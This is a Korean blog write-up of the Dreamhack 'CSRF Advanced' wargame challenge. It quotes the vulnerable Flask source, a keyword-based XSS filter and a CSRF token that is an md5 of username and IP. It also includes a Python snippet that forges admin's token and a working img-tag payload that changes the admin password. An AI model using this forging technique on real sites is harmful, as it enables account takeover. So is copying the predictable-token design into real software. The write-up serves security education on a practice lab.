https://dreamhack.io/wargame/challenges/442/?writeup_id=7748
CSRF Advanced
Exercise: CSRF Advanced에서 실습하는 문제입니다.
dreamhack.io
csrf 문제이다. 확인해보자.
첫 화면이다. 기존 csrf와 큰 차이점이 없어 보인다. 코드를 보면서 어떻게 풀지 생각해보자.
@app.route("/")
def index():
session_id = request.cookies.get('sessionid', None)
try:
username = session_storage[session_id]
except KeyError:
return render_template('index.html', text='please login')
return render_template('index.html', text=f'Hello {username}, {"flag is " + FLAG if username == "admin" else "you are not an admin"}')admin으로 접속하면 플래그를 얻을 수 있을 것으로 보인다.
@app.route("/vuln")
def vuln():
param = request.args.get("param", "").lower()
xss_filter = ["frame", "script", "on"]
for _ in xss_filter:
param = param.replace(_, "*")
return paramXSS에 대한 필터링이 이루어지고 있다. lower함수를 이용해서 대소문자를 이용한 우회도 어려워 보인다.
하지만 기존 csrf 문제에서 보았듯, 이미지 태그에 대한 필터링이 없으므로 이를 이용한 익스플로잇이 가능해 보인다.
@app.route("/flag", methods=["GET", "POST"])
def flag():
if request.method == "GET":
return render_template("flag.html")
elif request.method == "POST":
param = request.form.get("param", "")
if not check_csrf(param):
return '<script>alert("wrong??");history.go(-1);</script>'
return '<script>alert("good");history.go(-1);</script>'항상 같은 부분이므로 생략하고 넘어가겠다.
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'GET':
return render_template('login.html')
elif request.method == 'POST':
username = request.form.get('username')
password = request.form.get('password')
try:
pw = users[username]
except:
return '<script>alert("user not found");history.go(-1);</script>'
if pw == password:
resp = make_response(redirect(url_for('index')) )
session_id = os.urandom(8).hex()
session_storage[session_id] = username
token_storage[session_id] = md5((username + request.remote_addr).encode()).hexdigest()
resp.set_cookie('sessionid', session_id)
return resp
return '<script>alert("wrong password");history.go(-1);</script>'로그인 페이지다. 로그인에 성공했을 때 세션과 csrf 토큰이 주어지는 것이 보인다.
csrf 토큰이 username 과 ip주소를 암호화한 것으로 이루어진 것을 확인할 수 있다.
여기서 취약점이 보인다.토큰이 예측하기 쉬우며 1회성으로 발급해주는 방식이 아니다. 따라서 csrf 토큰을 우리가 만들 수 있어 보인다.
@app.route("/change_password")
def change_password():
session_id = request.cookies.get('sessionid', None)
try:
username = session_storage[session_id]
csrf_token = token_storage[session_id]
except KeyError:
return render_template('index.html', text='please login')
pw = request.args.get("pw", None)
if pw == None:
return render_template('change_password.html', csrf_token=csrf_token)
else:
if csrf_token != request.args.get("csrftoken", ""):
return '<script>alert("wrong csrf token");history.go(-1);</script>'
users[username] = pw
return '<script>alert("Done");history.go(-1);</script>'비밀번호 변경 페이지다. 우리가 찾은 토큰 값과 바꾸고 싶은 비밀번호를 같이 넣어주면 admin의 비밀번호를 바꿀 수 있을 것으로 보인다.
from hashlib import md5
username="admin"
remote_addr="127.0.0.1"
print(md5((username + remote_addr).encode()).hexdigest())우선 csrf 토큰을 구해보자. 필자는 이와같은 코드로 csrf 토큰을 구했다.
username은 우리가 얻고 싶은 계정인 admin
remote_addr은 ip주소를 뜻한다. 서버의 로컬 ip주소를 입력해주자.
<img src="/change_password?pw=1234&csrftoken=7505b9c72ab4aa94b1a4ed7b207b67fb">익스플로잇 코드다. img 태그의 src를 이용했다.
admin의 비밀번호를 1234로 설정했다. admin으로 로그인해주자.
짜자잔
요약
-csrf가 예측하기 쉽고 1회성이 아닌 경우 발생하는 취약점을 이용한 문제이다.
'드림핵' 카테고리의 다른 글
| [드림핵] [wargame.kr] strcmp (0) | 2023.07.12 |
|---|---|
| [드림핵] File Vulnerability Advanced for linux 풀이 (0) | 2023.07.10 |
| [드림핵] simple-web-request 풀이 (0) | 2023.07.09 |
| [드림핵] Command Injection Advanced 풀이 (0) | 2023.07.09 |
| [드림핵] [wargame.kr] tmitter (0) | 2023.07.06 |
